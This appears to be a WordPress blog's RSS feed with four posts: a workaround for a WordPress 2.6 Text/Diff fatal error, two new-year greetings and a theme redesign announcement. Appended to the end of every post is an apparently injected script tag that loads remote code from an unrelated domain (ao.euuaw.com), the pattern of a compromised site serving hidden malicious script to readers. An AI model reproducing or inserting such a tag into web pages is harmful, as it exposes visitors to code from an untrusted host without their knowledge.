<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Wacdesigns &#187; Uncategorized</title>
	<atom:link href="http://www.wacdesigns.com/category/uncategorized/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.wacdesigns.com</link>
	<description>What about Creativity ?</description>
	<lastBuildDate>Sat, 19 Jun 2010 12:58:26 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>Fatal error: require_once() [function.require]: Failed opening required &#8216;Text/Diff/Renderer.php&#8217;</title>
		<link>http://www.wacdesigns.com/2008/08/02/fatal-error-require_once-functionrequire-failed-opening-required-textdiffrendererphp/</link>
		<comments>http://www.wacdesigns.com/2008/08/02/fatal-error-require_once-functionrequire-failed-opening-required-textdiffrendererphp/#comments</comments>
		<pubDate>Sat, 02 Aug 2008 18:24:34 +0000</pubDate>
		<dc:creator>jf</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Bug]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.wacdesigns.com/?p=99</guid>
		<description><![CDATA[Was just trying to view one of my post that i modified once after being published and bumbed up with a page with these error messages: Warning: ini_set() has been disabled for security reasons in /home/wacdesig/public_html/wp-includes/pluggable.php on line 1517 Warning: &#8230; <a href="http://www.wacdesigns.com/2008/08/02/fatal-error-require_once-functionrequire-failed-opening-required-textdiffrendererphp/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Was just trying to view one of my post that i modified once after being published and bumbed up with a page with these error messages:</p>
<p><strong>Warning</strong>:  ini_set() has been disabled for security reasons in <strong>/home/wacdesig/public_html/wp-includes/pluggable.php</strong> on line <strong>1517</strong></p>
<p><strong>Warning</strong>:  require_once(Text/Diff/Renderer.php) [function.require-once]: failed to open stream: No such file or directory in <strong>/home/wacdesig/public_html/wp-includes/Text/Diff/Renderer/inline.php</strong> on line <strong>17</strong></p>
<p><strong>Fatal error</strong>:  require_once() [function.require]: Failed opening required &#8216;Text/Diff/Renderer.php&#8217; (include_path=&#8217;.:/usr/lib/php:/usr/local/lib/php&#8217;) in <strong>/home/wacdesig/public_html/wp-includes/Text/Diff/Renderer/inline.php</strong> on line <strong>17</strong></p>
<p>Apparently this is due to my hosting provider that have disabled the use the the PHP function ini_set(). Great !!! how do i edit post that i have edited before&#8230; fortunately i found out someone that came up with a solution <img src='http://www.wacdesigns.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> .</p>
<p>Please note that this issue is only for WP 2.6 and is cause by the new Revision module that allows you to view a revision of your post before it was edited.</p>
<p>Here is the link to the solution for this problem:<a href="http://www.code-styling.de/english/wordpress-26-and-the-textdiff-fatal-errors" target="_blank">http://www.code-styling.de/english/wordpress-26-and-the-textdiff-fatal-errors</a></p>
<p>I also found another solution for those who don&#8217;t want to download the modified WP source file that is proposed in the first solution</p>
<p>Edit the <strong>wp-includes/Text/Diff.php</strong>, line 52 :<br />
[php]<br />
require_once ABSPATH . WPINC . &#8216;/Text/Diff/Engine/&#8217; . $engine . &#8216;.php&#8217;;<br />
[/php]</p>
<p>Edit the <strong>wp-includes/Text/Diff/Renderer/inline.php</strong>, line 17 :<br />
[php]<br />
require_once ABSPATH . WPINC . &#8216;/Text/Diff/Renderer.php&#8217;;<br />
[/php]<br />
[ad#co-inlinepost]<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.wacdesigns.com/2008/08/02/fatal-error-require_once-functionrequire-failed-opening-required-textdiffrendererphp/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Happy new year 2008</title>
		<link>http://www.wacdesigns.com/2008/01/11/happy-new-year-2008/</link>
		<comments>http://www.wacdesigns.com/2008/01/11/happy-new-year-2008/#comments</comments>
		<pubDate>Fri, 11 Jan 2008 07:42:26 +0000</pubDate>
		<dc:creator>jf</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[2008]]></category>
		<category><![CDATA[New Year]]></category>

		<guid isPermaLink="false">http://www.wacdesigns.com/2008/01/11/happy-new-year-2008/</guid>
		<description><![CDATA[For all those out there, Happy New Year 2008, Wishing you success in your life for this year.]]></description>
			<content:encoded><![CDATA[<p>For all those out there, Happy New Year 2008, Wishing you success in your life for this year.<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.wacdesigns.com/2008/01/11/happy-new-year-2008/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Wacdesigns WordPress Theme V2</title>
		<link>http://www.wacdesigns.com/2007/03/12/wacdesigns-wordpress-theme-v2/</link>
		<comments>http://www.wacdesigns.com/2007/03/12/wacdesigns-wordpress-theme-v2/#comments</comments>
		<pubDate>Mon, 12 Mar 2007 08:35:05 +0000</pubDate>
		<dc:creator>jf</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Theme]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.wacdesigns.com/?p=54</guid>
		<description><![CDATA[I am back with a completely new theme idea, from the first version i realized that it was a bit too dark and way too compact&#8230; things were not obvious. So i re-designed it completely using lots of whitespaces&#8230; tell &#8230; <a href="http://www.wacdesigns.com/2007/03/12/wacdesigns-wordpress-theme-v2/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>I am back with a completely new theme idea, from the first version i realized that it was a bit too dark and way too compact&#8230; things were not obvious. So i re-designed it completely using lots of whitespaces&#8230; tell me what u think about it.<a class="imagelink" title="layout_v02.jpg" href="http://www.wacdesigns.com/wp-content/uploads/2007/03/layout_v02.jpg"><img id="image60" src="http://www.wacdesigns.com/wp-content/uploads/2007/03/layout_v02.thumbnail.jpg" alt="layout_v02.jpg" /></a><script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.wacdesigns.com/2007/03/12/wacdesigns-wordpress-theme-v2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>New Year&#8230;</title>
		<link>http://www.wacdesigns.com/2006/12/31/new-year/</link>
		<comments>http://www.wacdesigns.com/2006/12/31/new-year/#comments</comments>
		<pubDate>Sun, 31 Dec 2006 13:30:34 +0000</pubDate>
		<dc:creator>jf</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[2007]]></category>
		<category><![CDATA[New Year]]></category>

		<guid isPermaLink="false">http://www.wacdesigns.com/?p=46</guid>
		<description><![CDATA[Wishing all of you a happy and prosperous new year&#8230; for new beginnings&#8230; and for all those wishing to make up a better life for this coming year. To all of you Happy new year 2007]]></description>
			<content:encoded><![CDATA[<p>Wishing all of you a happy and prosperous new year&#8230; for new beginnings&#8230; and for all those wishing to make up a better life for this coming year. To all of you</p>
<p align="center"><strong>Happy new year 2007</strong></p>
<p><script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.wacdesigns.com/2006/12/31/new-year/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
